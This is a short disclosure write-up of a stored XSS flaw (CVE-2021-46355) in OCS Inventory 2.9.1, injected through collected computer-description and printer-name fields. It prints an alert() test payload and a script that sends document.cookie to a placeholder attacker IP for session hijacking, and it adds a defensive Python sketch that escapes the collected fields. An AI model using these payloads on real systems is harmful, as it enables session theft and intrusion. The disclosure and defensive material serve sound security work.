OCS Inventory 2.9.1 XSS Stored + Hijack Session (CVE-2021-46355)

Windsor Moreira
Feb 7, 2022

OCS Inventory 2.9.1 is affected by Cross-Site Scripting (XSS). To exploit the vulnerability, an attacker needs to manipulate the name of some device on their computer, such as a printer, replacing the device name with malicious code that is then executed as Stored Cross-Site Scripting (XSS). Through this vulnerability an attacker can hijack valid sessions.

After some time analyzing the OCS Inventory platform, I could see that the entries available for manual input were not susceptible to any kind of malicious manipulation like XSS, for example.

As I use OCS Inventory periodically, I know that its functionality consists of collecting information from assets available on the network such as computers and their peripherals and other devices.

Considering that the available inputs were not subject to any manipulation, I thought:

Ok. I can’t manipulate the available inputs, but what if I manipulate the data collected and displayed in OCS so that it’s interpreted and executed the way I want?

So I started to analyze what information was collected on the computer through the OCS client and what modifications could be made, and I found two attack vectors.

The first attack vector is the computer description field.

Administrative data: Description

The second attack vector I used is the printer name field, in this case.

Devices: Printers

Proof of Concept exploring the two vectors mentioned here.

Used Payloads
Attack 1:

<IMG SRC=x onerror="alert(1);">

Attack 2:

<script>
var i=new Image;i.src="http://YOUR_IP/?"+document.cookie;
</script>

CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46355

NVD: https://nvd.nist.gov/vuln/detail/CVE-2021-46355
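
Both vectors work because values collected by the agent (computer description, printer name) are displayed in the console as HTML rather than as text. The following Python sketch is an added example, not code from this post or from OCS Inventory: it flags collected fields that carry HTML-significant characters and renders them HTML-encoded. The XML element names, function names and the sample report are constructed assumptions.

```python
import html
import xml.etree.ElementTree as ET

# Constructed sample of an agent inventory report. The element names are
# assumptions for this example, not copied from the OCS Inventory schema.
SAMPLE_INVENTORY = """\
<REQUEST>
  <CONTENT>
    <HARDWARE>
      <NAME>WS-0042</NAME>
      <DESCRIPTION>Finance laptop, 2nd floor</DESCRIPTION>
    </HARDWARE>
    <PRINTERS>
      <NAME>&lt;IMG SRC=x onerror="alert(1);"&gt;</NAME>
      <DRIVER>Generic PCL 6</DRIVER>
    </PRINTERS>
  </CONTENT>
</REQUEST>
"""

MARKUP_CHARS = set("<>\"'&")  # characters with meaning in an HTML context


def collected_fields(xml_text):
    """Yield (path, value) for every leaf element under CONTENT."""
    root = ET.fromstring(xml_text)
    for section in root.find("CONTENT"):
        for leaf in section:
            yield f"{section.tag}/{leaf.tag}", (leaf.text or "")


def suspicious_fields(xml_text):
    """Return paths of fields whose value carries HTML-significant characters."""
    return [path for path, value in collected_fields(xml_text)
            if MARKUP_CHARS & set(value)]


def render_row(path, value):
    """Render one console table row with the collected value HTML-encoded."""
    return f"<tr><td>{html.escape(path)}</td><td>{html.escape(value, quote=True)}</td></tr>"


if __name__ == "__main__":
    print("flagged:", suspicious_fields(SAMPLE_INVENTORY))
    for path, value in collected_fields(SAMPLE_INVENTORY):
        print(render_row(path, value))
```

Flagging is a triage aid only, since legitimate device names can contain `&` or quotes; encoding at output time is what stops the collected value from being interpreted as markup.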
